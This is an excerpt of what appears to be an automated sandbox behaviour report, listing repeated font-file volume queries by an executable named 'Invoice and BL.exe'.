            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
